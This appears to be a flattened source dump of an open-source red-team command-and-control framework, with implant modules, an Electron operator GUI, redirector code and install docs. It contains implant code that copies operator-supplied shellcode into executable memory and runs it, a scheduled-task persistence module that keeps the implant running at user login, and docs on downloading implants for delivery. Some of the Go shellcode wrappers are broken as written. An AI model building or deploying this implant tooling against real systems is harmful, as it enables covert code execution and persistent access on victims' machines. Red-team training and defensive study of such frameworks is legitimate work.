24 | 25 | -------------------------------------------------------------------------------- /installConfig/implant_dependencies.txt: -------------------------------------------------------------------------------- 1 | /////STime Implant Dependencies//// 2 | 3 | To install Hive, "installFolder" will need: 4 | 5 | MacOSX10.13.sdk.tar 6 | windependencies.zip 7 | 8 | 9 | For A, Follow instructions on: https://github.com/tpoechtrager/osxcross 10 | 11 | For B, windependencies.zip needs within: 12 | 13 | includes/ 14 | taskschd.h 15 | libs/ 16 | x86/ 17 | comsupp.lib 18 | x64/ 19 | comsupp.lib 20 | 21 | How to Get Needed Dependencies? 22 | Windows 10 + MVS --> "C++ Concole apps Development" 23 | Look target Folders for required libraries 24 | 25 | Module Persistence: schtasks 26 | 27 | Includes 28 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\taskschd.h 29 | Libs 30 | x86 31 | C:\Program Files\Windows Kits\10\Lib\10.0.18362.0\um\x86\taskschd.lib 32 | C:\Program Files\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.23.28105\lib\x86\comsupp.lib 33 | 34 | x64 35 | C:\Program Files\Windows Kits\10\Lib\10.0.18362.0\um\x64\taskschd.lib 36 | C:\Program Files\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.23.28105\lib\x64\comsupp.lib 37 | 38 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/report/report.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Report

6 |
    7 |
  • 8 |
    • 9 |
  • 10 |
    • 11 |
12 |
13 |
14 |
15 | 16 |
17 |
18 | 19 |
20 | 21 |
22 |
23 |
24 |
25 |
26 | 27 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/header/header.js: -------------------------------------------------------------------------------- 1 | //Load data on the header in every refresh of the component 2 | $(document).ready(function() { 3 | 4 | var binumber = 0; 5 | for (i = 0; i < bichitos.length; i++){ 6 | if (bichitos[i].status == "Online"){ 7 | binumber++; 8 | } 9 | } 10 | 11 | var rednumber = 0; 12 | for (i = 0; i < redirectors.length; i++){ 13 | rednumber++; 14 | } 15 | 16 | var inumber = 0; 17 | for (i = 0; i < implants.length; i++){ 18 | inumber++; 19 | } 20 | 21 | var vnumber = 0; 22 | for (i = 0; i < vps.length; i++){ 23 | vnumber++; 24 | } 25 | 26 | var dnumber = 0; 27 | for (i = 0; i < domains.length; i++){ 28 | dnumber++; 29 | 30 | } 31 | 32 | var snumber = 0; 33 | for (i = 0; i < stagings.length; i++){ 34 | snumber++; 35 | } 36 | 37 | $("#himplants").text(inumber); 38 | $("#hbichitos").text(binumber); 39 | $("#hdomains").text(dnumber); 40 | $("#hvps").text(vnumber); 41 | $("#hredirectors").text(rednumber); 42 | $("#hstagings").text(snumber); 43 | $("#username").text("Logged as "+ htmlencode.htmlEncode(username.username)); 44 | 45 | }) 46 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/ls_trio.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "io/ioutil" 7 | "strings" 8 | ) 9 | 10 | /* 11 | Description: List Files --> Linux,Darwin and Windows 12 | Flow: 13 | A.Use golang native ioutil library to list target PATH folder files 14 | */ 15 | func List(commands string) (bool,string){ 16 | 17 | var result string 18 | 19 | arguments := strings.Split(commands," ") 20 | if len(arguments) != 1 { 21 | return true,"Incorrect Number of params" 22 | } 23 | 24 | var dirs,files []string 25 | elements, err := ioutil.ReadDir(arguments[0]) 26 | if err != nil { 27 | return true,"Error reading folder:"+err.Error() 28 | } 29 | 30 | for _, element := range elements { 31 | if element.IsDir() { 32 | dirs = append(dirs,element.Name()) 33 | }else{ 34 | files = append(files,element.Name()) 35 | } 36 | } 37 | 38 | result = "---------------Directories-----------\n" 39 | for _, dir := range dirs{ 40 | result = result + dir +"\n" 41 | } 42 | 43 | result = result + "---------------Files-----------------\n" 44 | for _, file := range files{ 45 | result = result + file + "\n" 46 | } 47 | 48 | return false,result 49 | } 50 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/jobs/jobs.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 |
7 |
8 |
9 |

Jobs

10 |
11 |
12 |
13 |

14 | Click Job to Show Results 15 |

16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 |
CidJidTimeJobStatus
30 |
31 |
32 |
33 |
34 | 35 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/createforms/createOperator.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Add Operator

6 |
7 |
8 |
9 | 10 |
11 | 12 |
13 | 14 | 15 |
16 |
17 | 18 | 19 |
20 | 21 | 22 |
23 | 24 |
25 |
26 |
27 |
28 | 29 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/createforms/createVPS.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Add VPS

6 |
7 |
8 |
9 | 10 |
11 | 12 |
13 | 14 | 15 |
16 | 17 | 18 | 22 |
23 | 24 |
25 | 26 |
27 |
28 |
29 |
30 | 31 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/accesschk_windows.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "fmt" 7 | "os" 8 | "github.com/hectane/go-acl/api" 9 | "golang.org/x/sys/windows" 10 | ) 11 | 12 | /* 13 | Description: AccessCheck --> Windows 14 | Flow: 15 | A.Use Native golang windows sys calls and go-acl libraries and to get key operating System data 16 | */ 17 | func Accesschk(filepath string) (bool,string){ 18 | 19 | var result string 20 | 21 | var ( 22 | owner *windows.SID 23 | secDesc windows.Handle 24 | ) 25 | 26 | fileInfo, err := os.Stat(filepath) 27 | if err != nil { 28 | return true,"Error Listing stats of file: "+err.Error() 29 | } 30 | 31 | err = api.GetNamedSecurityInfo( 32 | filepath, 33 | api.SE_FILE_OBJECT, 34 | api.OWNER_SECURITY_INFORMATION, 35 | &owner, 36 | nil, 37 | nil, 38 | nil, 39 | &secDesc, 40 | ) 41 | 42 | if err != nil { 43 | return true,"Error Api call GetNamedSecurityInfo: "+err.Error() 44 | } 45 | defer windows.LocalFree(secDesc) 46 | 47 | result = "File name ||| Bytes ||| Permissions ||| SID ||| Last Modified\n" 48 | result = result + fmt.Sprintf("%s ||| %d ||| %s ||| %s ||| %s \n",fileInfo.Name(),fileInfo.Size(),fileInfo.Mode(),owner,fileInfo.ModTime()) 49 | 50 | return false,result 51 | 52 | } 53 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/createforms/createDomain.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Add Domain

6 |
7 |
8 |
9 | 10 |
11 | 12 |
13 | 14 | 15 |
16 |
17 | 18 |
19 | 20 | 24 | 25 |
26 |
27 | 28 |
29 |
30 |
31 |
32 | 33 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/execute_assembly_windows/execute_assembly_windows_x32.go: -------------------------------------------------------------------------------- 1 | // +build 386 2 | 3 | package windows_executeassembly_windows 4 | 5 | import ( 6 | 7 | "fmt" 8 | "io/ioutil" 9 | "os" 10 | "unsafe" 11 | 12 | ) 13 | 14 | 15 | /* 16 | #cgo CXXFLAGS: -I"../../../../../winDependencies/includes/" 17 | #cgo LDFLAGS: -L"../../../../../winDependencies/libs/x86/" -static 18 | #include "windows_executeassembly_windows.h" 19 | #include 20 | */ 21 | import "C" 22 | 23 | 24 | type BiExecuteAssembly struct { 25 | Shellcode string `json:"shellcode"` 26 | } 27 | 28 | var moduleParams *BiExecuteAssembly 29 | 30 | 31 | func ExecuteAssembly(jsonPersistence string,blob string) (bool,string){ 32 | 33 | errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams) 34 | if errDaws != nil{ 35 | return true,"Error Decoding Persistence Module Params:" + errDaws.Error() 36 | } 37 | 38 | 39 | var ptrShellcode *C.char = C.CString(moduleParams.Shellcode) 40 | defer C.free(unsafe.Pointer(ptrShellcode)) 41 | 42 | var size_shellcode C.int = C.int(len(content)) 43 | 44 | 45 | ptrError := C.malloc(C.sizeof_char * 1024) 46 | defer C.free(unsafe.Pointer(ptrError)) 47 | 48 | C.ExecuteAssembly((*C.char)(ptrShellcode),size_shellcode,(*C.char)(ptrError)) 49 | 50 | errorString := C.GoString((*C.char)(ptrError)) 51 | if (error != 1){ 52 | 53 | return true,"Execute Assembly Error:" + string(errorString) 54 | } 55 | 56 | 57 | return false,"Assemly Executed" 58 | } 59 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/execute_assembly_windows/execute_assembly_windows_x64.go: -------------------------------------------------------------------------------- 1 | // +build amd64 2 | 3 | package windows_executeassembly_windows 4 | 5 | import ( 6 | 7 | "fmt" 8 | "io/ioutil" 9 | "os" 10 | "unsafe" 11 | 12 | ) 13 | 14 | 15 | /* 16 | #cgo CXXFLAGS: -I"../../../../../winDependencies/includes/" 17 | #cgo LDFLAGS: -L"../../../../../winDependencies/libs/x64/" -static 18 | #include "windows_executeassembly_windows.h" 19 | #include 20 | */ 21 | import "C" 22 | 23 | 24 | type BiExecuteAssembly struct { 25 | Shellcode string `json:"shellcode"` 26 | } 27 | 28 | var moduleParams *BiExecuteAssembly 29 | 30 | 31 | func ExecuteAssembly(jsonPersistence string,blob string) (bool,string){ 32 | 33 | errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams) 34 | if errDaws != nil{ 35 | return true,"Error Decoding Persistence Module Params:" + errDaws.Error() 36 | } 37 | 38 | 39 | var ptrShellcode *C.char = C.CString(moduleParams.Shellcode) 40 | defer C.free(unsafe.Pointer(ptrShellcode)) 41 | 42 | var size_shellcode C.int = C.int(len(content)) 43 | 44 | 45 | ptrError := C.malloc(C.sizeof_char * 1024) 46 | defer C.free(unsafe.Pointer(ptrError)) 47 | 48 | C.ExecuteAssembly((*C.char)(ptrShellcode),size_shellcode,(*C.char)(ptrError)) 49 | 50 | errorString := C.GoString((*C.char)(ptrError)) 51 | if (error != 1){ 52 | 53 | return true,"Execute Assembly Error:" + string(errorString) 54 | } 55 | 56 | 57 | return false,"Assemly Executed" 58 | } 59 | -------------------------------------------------------------------------------- /docs/install/client.rst: -------------------------------------------------------------------------------- 1 | Client 2 | =========================== 3 | 4 | 5 | Once Hive is Online, operators can connect to it, but they need to install their client first 6 | 7 | 8 | What this does? What is the Client 9 | ------------------------------------ 10 | 11 | GUI electron powered and Go application running in Operators' devices. The go client executable run a localhost server that feeds data to the electron app. In the same time, the go client executable authenticate against Hive with credentials passed in compiled time. 12 | Clients will authenticate against hive and send jobs to it. They can also interact with Post. Servers thanks to a Hive tunnelization system 13 | 14 | * Install Client OS dependencies 15 | * Use config.txt to get user credentials 16 | * Download Go and dependencies to compile client 17 | * Configure and install electron app 18 | 19 | 20 | 21 | Install 22 | ----------- 23 | 24 | Run ``stime.sh`` for client installation. This will compile stclient with provided credentials and configuration, and will generate the GUI folder. 25 | ``stime.sh install `` 26 | 27 | .. prompt:: bash $ 28 | 29 | ./stime.sh install admin admin 13.57.31.79 6232 8000 $(openssl x509 -fingerprint -sha256 -noout -in ./installConfig/hive.pem | cut -d '=' -f2) 30 | 31 | 32 | Run the Client 33 | --------------- 34 | 35 | 36 | .. prompt:: bash $ 37 | 38 | ./stime.sh 39 | 40 | Uninstall 41 | ----------- 42 | 43 | Will remove go dependencies 44 | ``./stime.sh remove`` 45 | 46 | -------------------------------------------------------------------------------- /docs/resources/domains.rst: -------------------------------------------------------------------------------- 1 | Domains 2 | =========================== 3 | 4 | Domains let the operator to add domain resources that can be used in the C2 deployment. Operators can list them to see if they are in use by any infrastructure already with the attribute ``active`` 5 | 6 | 7 | List Domain Info/Remove: ``Domains/SaaS --> example.xyz`` 8 | 9 | Add New domain: ``Domains/SaaS --> Add Domain`` 10 | 11 | 12 | Domain Status/Remove 13 | ----------------------- 14 | 15 | .. figure:: ../_static/images/addresources/domainstatus.png 16 | :align: center 17 | :figwidth: 600px 18 | :target: ../_static/images/addresources/domainstatus.png 19 | 20 | 21 | Godaddy 22 | ---------------- 23 | 24 | Keys --> `godaddykeys`_ 25 | 26 | 27 | .. figure:: ../_static/images/addresources/godaddy.png 28 | :align: center 29 | :figwidth: 600px 30 | :target: ../_static/images/addresources/godaddy.png 31 | 32 | 33 | Gmail 34 | ----------- 35 | 36 | * How to get my gmail connected App Credentials? 37 | * Create gmail Account 38 | * Follow instructions --> `goquickstart`_ 39 | * Put both ``credentials.json`` and ``token.json`` Strings 40 | 41 | 42 | 43 | .. figure:: ../_static/images/addresources/gmail.png 44 | :align: center 45 | :figwidth: 600px 46 | :target: ../_static/images/addresources/gmail.png 47 | 48 | 49 | .. note:: 50 | You need to specify the following gmail app access ``google.ConfigFromJSON(b, gmail.GmailModifyScope)`` 51 | 52 | .. _godaddykeys: https://developer.godaddy.com/keys/ 53 | .. _goquickstart: https://developers.google.com/gmail/api/quickstart/go -------------------------------------------------------------------------------- /src/client/electronGUI/components/jobs/jobs.js: -------------------------------------------------------------------------------- 1 | getJobs(); 2 | 3 | $(document).ready(function() { 4 | 5 | 6 | //Determine id of Job/Log component and load respective jobs/logs 7 | var id = $(".STmain").attr("id"); 8 | $(".STmain").find(".element").text(id); 9 | 10 | $(".STmain").find(".jtable").empty(); 11 | 12 | //Loop over Logs JSON DB and add Jogs related to parent summoning "id" (Bichito ID or "Hive") 13 | for (i = 0; i < jobs.length; i++){ 14 | var row = jobs[i]; 15 | if ((row.pid == id) || (row.chid == id)){ 16 | if (row.result.length >= 10000) { 17 | row.result = "Too Large Output - blob"; 18 | } 19 | $(".STmain").find(".jtable").append(""+htmlencode.htmlEncode(row.cid)+""+htmlencode.htmlEncode(row.jid)+""+htmlencode.htmlEncode(row.time)+""+htmlencode.htmlEncode(row.job)+""+htmlencode.htmlEncode(row.status)+""+htmlencode.htmlEncode(row.parameters)+"
"+htmlencode.htmlEncode(row.result)+"
"); 20 | } 21 | } 22 | 23 | 24 | //Used to show more info on click the table row 25 | if ($(".STmain").find('.table').length > 0) { 26 | $(".STmain").find('.table .header').on("click", function() { 27 | 28 | $(this).toggleClass("active", "").nextUntil('.header').css('display', function(i, v) { 29 | return this.style.display === 'table-row' ? 'none' : 'table-row'; 30 | }); 31 | }); 32 | } 33 | 34 | 35 | }) -------------------------------------------------------------------------------- /src/client/electronGUI/components/header/header.html: -------------------------------------------------------------------------------- 1 |
2 |
3 | Implants 4 |
5 |
6 |
7 | Redirectors 8 |
9 |
10 |
11 | Bichitos 12 |
13 |
14 |
15 | VPS 16 |
17 |
18 |
19 | Domains 20 |
21 |
22 |
23 | Stagings 24 |
25 |
26 |
27 | -------------------------------------------------------------------------------- /src/redirector/redMisc.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Redirector Main }}}}}}} 2 | 3 | //// REdirector is the Modular Proxy software from SiestaTime Framework 4 | // A. main 5 | 6 | 7 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 8 | package main 9 | 10 | import ( 11 | "time" 12 | "bytes" 13 | "encoding/json" 14 | "math/rand" 15 | "strings" 16 | ) 17 | 18 | type Log struct { 19 | Pid string `json:"pid"` // Parent Id: Hive, R-/B- 20 | Time string `json:"time"` 21 | Error string `json:"error"` 22 | } 23 | 24 | 25 | func addLog(error string){ 26 | 27 | var( 28 | log Log 29 | job Job 30 | ) 31 | 32 | if !strings.Contains(rid,"R-"){ 33 | return 34 | } 35 | 36 | //Skip logs when there is a job/log overhead 37 | if len(jobsToHive.Jobs) > 10 { 38 | return 39 | } 40 | 41 | time := time.Now().Format("02/01/2006 15:04:05 MST") 42 | log = Log{rid,time,error} 43 | 44 | bufRP := new(bytes.Buffer) 45 | json.NewEncoder(bufRP).Encode(log) 46 | resultRP := bufRP.String() 47 | param := "["+resultRP+"]" 48 | 49 | //Mutex to avoid Race Conditions 50 | 51 | 52 | 53 | job = Job{"","",rid,"None","log","","","",param} 54 | jobsToHive.mux.Lock() 55 | jobsToHive.Jobs = append(jobsToHive.Jobs, &job) 56 | jobsToHive.mux.Unlock() 57 | 58 | return 59 | } 60 | 61 | func randomString(length int) string{ 62 | 63 | charset := "abcdefghijklmnopqrstuvwxyz" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 64 | var seededRand *rand.Rand = rand.New(rand.NewSource(time.Now().UnixNano())) 65 | b := make([]byte, length) 66 | for i := range b { 67 | b[i] = charset[seededRand.Intn(len(charset))] 68 | } 69 | 70 | return string(b) 71 | } -------------------------------------------------------------------------------- /docs/interactions/implants.rst: -------------------------------------------------------------------------------- 1 | Implants 2 | =========================== 3 | 4 | Once the Implants and Post. Servers are created and you already have the infrastructure ready to go on a Red team operation. 5 | Now you are ready to download them for delivery purposes. 6 | 7 | Information 8 | -------------------------------------------- 9 | 10 | ``Implants --> ImplantName`` 11 | 12 | .. figure:: ../_static/images/interactions/listimplant.png 13 | :align: center 14 | :figwidth: 600px 15 | :target: ../_static/images/interactions/listimplant.png 16 | 17 | 18 | 19 | Download Implant 20 | -------------------------------------------------- 21 | 22 | Once the implant is listed, it is possible to download from hive both implant and redirector executables 23 | 24 | ``Implants --> ImplantName --> Download`` 25 | 26 | .. figure:: ../_static/images/interactions/downloadimplant.png 27 | :align: center 28 | :figwidth: 600px 29 | :target: ../_static/images/interactions/downloadimplant.png 30 | 31 | 32 | .. note:: 33 | Every Download on Hive will be made to ``SiestaTime/installConfig/downloads`` 34 | 35 | 36 | Delivery - Attacks 37 | -------------------------------------------------- 38 | 39 | Once the implant is created some Delivery options or “Attacks” will be available. In the future, delivery options like phishing, macro… will be available. 40 | 41 | Drop Implant 42 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 43 | 44 | To drop implant simply choose a previously created droplet 45 | 46 | .. figure:: ../_static/images/interactions/implantwithindroplet.png 47 | :align: right 48 | :figwidth: 300px 49 | :target: ../_static/images/interactions/implantwithindroplet.png 50 | 51 | 52 | HTA 53 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 54 | ``TBD`` -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/execute_assembly_windows/execute_assembly_windows.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include "windows_executeassembly_windows.h" 3 | #include 4 | #include 5 | 6 | 7 | std::string GetLastErrorAsString() 8 | { 9 | //Get the error message ID, if any. 10 | DWORD errorMessageID = ::GetLastError(); 11 | if (errorMessageID == 0) { 12 | return std::string(); //No error message has been recorded 13 | } 14 | 15 | LPSTR messageBuffer = nullptr; 16 | 17 | //Ask Win32 to give us the string version of that message ID. 18 | //The parameters we pass in, tell Win32 to create the buffer that holds the message for us (because we don't yet know how long the message string will be). 19 | size_t size = FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, 20 | NULL, errorMessageID, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPSTR)&messageBuffer, 0, NULL); 21 | 22 | //Copy the error message into a std::string. 23 | std::string message(messageBuffer, size); 24 | 25 | //Free the Win32's string's buffer. 26 | LocalFree(messageBuffer); 27 | 28 | return message; 29 | } 30 | 31 | int ExecuteAssembly(char* shellcode, int size_shellcode,char* error)//char* result,char* error) 32 | { 33 | 34 | void* exec = VirtualAlloc(0, size_shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 35 | if (exec == NULL) { 36 | DWORD dwError = GetLastError(); 37 | sprintf(error, "VirtualAllocEx Error: %ld", dwError); 38 | return 0; 39 | } 40 | 41 | memcpy(exec, shellcode, size_shellcode); 42 | 43 | std::cout << "Pre exc" << std::endl; 44 | ((void(*)())exec)(); 45 | std::cout << "Post exc" << std::endl; 46 | 47 | return 1; 48 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/vps/vps.js: -------------------------------------------------------------------------------- 1 | 2 | $(document).ready(function() { 3 | 4 | 5 | //Determine if elog is for hive,red or bichito, then load the logs for each case 6 | var name = $(".STmain").attr("id"); 7 | 8 | $("#iname").text(htmlencode.htmlEncode(name)); 9 | $("#element").text(htmlencode.htmlEncode(name)); 10 | $("#delval").attr("value",htmlencode.htmlEncode(name)); 11 | 12 | for (i = 0; i < vps.length; i++){ 13 | if (vps[i].name == name){ 14 | var vpsi = vps[i]; 15 | } 16 | } 17 | 18 | $("#type").text(htmlencode.htmlEncode(vpsi.vtype)); 19 | 20 | 21 | }) 22 | 23 | /* 24 | type DeleteVps struct{ 25 | Name string `json:"name"` 26 | } 27 | */ 28 | $("#submitdelvps").on('click',function() { 29 | 30 | //Transform the array in one JSON STRING 31 | function objectifyForm(formArray) { 32 | var returnArray = {}; 33 | for (var i = 0; i < formArray.length; i++){ 34 | returnArray[formArray[i]['name']] = formArray[i]['value']; 35 | } 36 | return returnArray; 37 | } 38 | //Serialize form in the correct way 39 | 40 | var submitdelvpsJSON = objectifyForm($("#delvpsform").serializeArray()); 41 | //console.log(submitdelvpsJSON); 42 | 43 | //Create Job to send with two elements 44 | var data = {cid:"",jid:"",pid:"Hive",chid:"None",job:"deleteVPS",time:"",status:"",result:"",parameters:"["+JSON.stringify(submitdelvpsJSON)+"]"}; 45 | $.ajax({ 46 | type: "POST", 47 | url: "http://127.0.0.1:8000/job", 48 | data: JSON.stringify(data), 49 | contentType: "application/json; charset=utf-8", 50 | dataType: "json", 51 | success: function (response){ 52 | if (response != null){ 53 | 54 | return 55 | } 56 | } 57 | 58 | }); 59 | 60 | }); -------------------------------------------------------------------------------- /src/client/client.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Client Main Function }}}}}}} 2 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 3 | 4 | 5 | package main 6 | 7 | import ( 8 | "encoding/json" 9 | "bytes" 10 | "strings" 11 | "sync" 12 | ) 13 | 14 | 15 | // Define the Struct with a mutex to access the mem. shared Jobs to send to Hive 16 | type JobsToSend struct { 17 | mux sync.RWMutex 18 | Jobs []*Job 19 | } 20 | 21 | 22 | //On Compile variables: 23 | /* 24 | roasterString --> Domain/Ip of Hive 25 | fingerPrint --> TLS Fingerprint of target Hive Server TLS Certificate 26 | username --> Operator Credential 27 | password --> Operator Credential 28 | jobsToSend *JobsToSend --> Jobs array 29 | clientPort --> Port that will listen on localhost, and will receive electron requests 30 | */ 31 | var ( 32 | roasterString string 33 | fingerPrint string 34 | username string 35 | password string 36 | jobsToSend *JobsToSend 37 | clientPort string 38 | ) 39 | 40 | 41 | /* 42 | Description: Client Service Main Function 43 | Flow: 44 | A.Encode the Authenthication Header for login to Hive 45 | B.Initialize the "on-memory" Slice for the Jobs to be sent to Hive 46 | C.Start localhost handler for the GUI Interface 47 | */ 48 | func main() { 49 | 50 | //Create Auth Bearer with Operator credentials, that will be used in each request towards Hive 51 | tmp := UserAuth{username,password} 52 | bufA := new(bytes.Buffer) 53 | json.NewEncoder(bufA).Encode(tmp) 54 | authbearer = strings.TrimSuffix(bufA.String(), "\n") 55 | 56 | //Initialize on memory slices for Send Jobs to Hive 57 | var jobs []*Job 58 | jobsToSend = &JobsToSend{Jobs:jobs} 59 | 60 | //Start Client Listener 61 | guiHandler() 62 | 63 | } -------------------------------------------------------------------------------- /src/bichito/modules/persistence/windows_schtasks.go: -------------------------------------------------------------------------------- 1 | // +build schtasks 2 | 3 | package persistence 4 | 5 | import ( 6 | "bichito/modules/persistence/windows_schtasks" 7 | ) 8 | 9 | 10 | /* 11 | Windows Persistence 12 | --> User-Mode 13 | --> SCHTASKS Persistence 14 | --> Triggered: User Login 15 | 16 | AddPersistence --> 17 | A.Decode JSON Persistence parameters 18 | B.Upload one of the parameters (the implant as a binary string blob) on target PATH (relative to user home) 19 | C.Using C++ (windows_schtasks.cpp), create a User-level schtasks, which on log-in execute target PATH executable file 20 | 21 | CheckPersistence --> 22 | A.Decode JSON Persistence parameters 23 | B.Execute accesschk on target PATH to check if Implant executable is present on disk 24 | 25 | RemovePersistence --> 26 | A.Decode JSON Persistence parameters 27 | B.Using C++ (windows_schtasks.cpp),, remove target name schtasks 28 | C.Spawn a process to kill the foothold process,sleep,and remove target PATH implant executable (previously persisted) 29 | */ 30 | 31 | func AddPersistence(jsonPersistence string,blob string) (bool,string){ 32 | 33 | err,result := windows_schtasks.AddPersistenceSchtasks(jsonPersistence,blob) 34 | if err != false { 35 | return true,result 36 | } 37 | 38 | return false,"Persisted" 39 | } 40 | 41 | func CheckPersistence(jsonPersistence string) (bool,string){ 42 | 43 | err,result := windows_schtasks.CheckPersistenceSchtasks(jsonPersistence) 44 | if err != false { 45 | return true,result 46 | } 47 | 48 | return false,result 49 | } 50 | 51 | 52 | func RemovePersistence(jsonPersistence string) (bool,string){ 53 | 54 | err,result := windows_schtasks.RemovePersistenceSchtasks(jsonPersistence) 55 | if err != false { 56 | return true,result 57 | } 58 | 59 | return false,"Persistence Removed" 60 | } -------------------------------------------------------------------------------- /docs/misc/bugs.rst: -------------------------------------------------------------------------------- 1 | Known Bugs 2 | =========================== 3 | 4 | 5 | Client 6 | -------------------------- 7 | 8 | Job Creation - Stuck 9 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 10 | The client software implements a lock to avoid the triggering of too many jobs against Hive. This still can be faulty and the lock stuck to 0. 11 | If this happens a restart on the GUI/Client is recommended. 12 | 13 | Hive 14 | -------------------------------------------- 15 | 16 | Jobs Queue - GUI 17 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 18 | Hive will execute jobs 1 by 1. Once an output for each Job is reached, the Jobs will update. 19 | This means that while Hive is busy operators will not see any updates on the client for sent jobs. 20 | 21 | DB Locked 22 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 23 | Multiple writes on Hive DB have been shown to block DB and miss writes. 24 | This normally happens when multiple “Hive Jobs” are sequenced too simultaneously. 25 | 26 | 27 | Redirector 28 | -------------------------------------------------- 29 | 30 | Not common known problems are still known in redirector software 31 | Deadlock is known to have happened in the past, but redirectors auto-restart if this happens. 32 | 33 | .. note:: 34 | Having a bunch of redirectors if recommended if some of them fails 35 | 36 | Bichito 37 | -------------------------------------------------- 38 | 39 | Not common known problems are still known in implant/Bichito software 40 | 41 | .. note:: 42 | Persistence is recommended in the scenario where the bichito/implant software could block its functionality on unknown bugs 43 | 44 | 45 | Post. Servers 46 | -------------------------------------------------- 47 | 48 | .. note:: 49 | Faulty Staging/Post. Can be easily trashed and re-deployed. If the user feels any of them is becoming faulty, use the rapid deployment properties of STime to create it again. -------------------------------------------------------------------------------- /src/bichito/biMisc.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Hive Miscelanious Functions and external sources }}}}}}} 2 | 3 | //// Extra functions to help Hive with different tasks 4 | 5 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 6 | package main 7 | 8 | import ( 9 | "time" 10 | "bytes" 11 | "encoding/json" 12 | "strings" 13 | "math/rand" 14 | ) 15 | 16 | type Log struct { 17 | Pid string `json:"pid"` // Parent Id: Hive, R-/B- 18 | Time string `json:"time"` 19 | Error string `json:"error"` 20 | } 21 | 22 | 23 | //Add a Log to the Jobs to send 24 | 25 | func addLog(error string){ 26 | 27 | var( 28 | log Log 29 | job Job 30 | ) 31 | 32 | //Lock shared Slice 33 | jobsToHive.mux.Lock() 34 | defer jobsToHive.mux.Unlock() 35 | 36 | if !strings.Contains(bid,"B-"){ 37 | return 38 | } 39 | 40 | //Skip logs when there is a job/log overhead 41 | if len(jobsToHive.Jobs) > 10 { 42 | return 43 | } 44 | 45 | time := time.Now().Format("02/01/2006 15:04:05 MST") 46 | log = Log{bid,time,error} 47 | 48 | bufRP := new(bytes.Buffer) 49 | json.NewEncoder(bufRP).Encode(log) 50 | resultRP := bufRP.String() 51 | param := "["+resultRP+"]" 52 | 53 | //Check that the size of the Result doesn't exceed 20 MB 54 | bytesLog := len(param) 55 | if (bytesLog >= 20000000){ 56 | param = "This log was too long...Skipped to avoid crashes" 57 | } 58 | 59 | job = Job{"","","",bid,"log","","","",param} 60 | jobsToHive.Jobs = append(jobsToHive.Jobs, &job) 61 | } 62 | 63 | func randomString(length int) string{ 64 | 65 | charset := "abcdefghijklmnopqrstuvwxyz" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 66 | var seededRand *rand.Rand = rand.New(rand.NewSource(time.Now().UnixNano())) 67 | b := make([]byte, length) 68 | for i := range b { 69 | b[i] = charset[seededRand.Intn(len(charset))] 70 | } 71 | 72 | return string(b) 73 | } -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/mixins.less: -------------------------------------------------------------------------------- 1 | // Mixins 2 | // -------------------------- 3 | 4 | .fa-icon() { 5 | display: inline-block; 6 | font: normal normal normal @fa-font-size-base/@fa-line-height-base FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | 14 | .fa-icon-rotate(@degrees, @rotation) { 15 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=@{rotation})"; 16 | -webkit-transform: rotate(@degrees); 17 | -ms-transform: rotate(@degrees); 18 | transform: rotate(@degrees); 19 | } 20 | 21 | .fa-icon-flip(@horiz, @vert, @rotation) { 22 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=@{rotation}, mirror=1)"; 23 | -webkit-transform: scale(@horiz, @vert); 24 | -ms-transform: scale(@horiz, @vert); 25 | transform: scale(@horiz, @vert); 26 | } 27 | 28 | 29 | // Only display content to screen readers. A la Bootstrap 4. 30 | 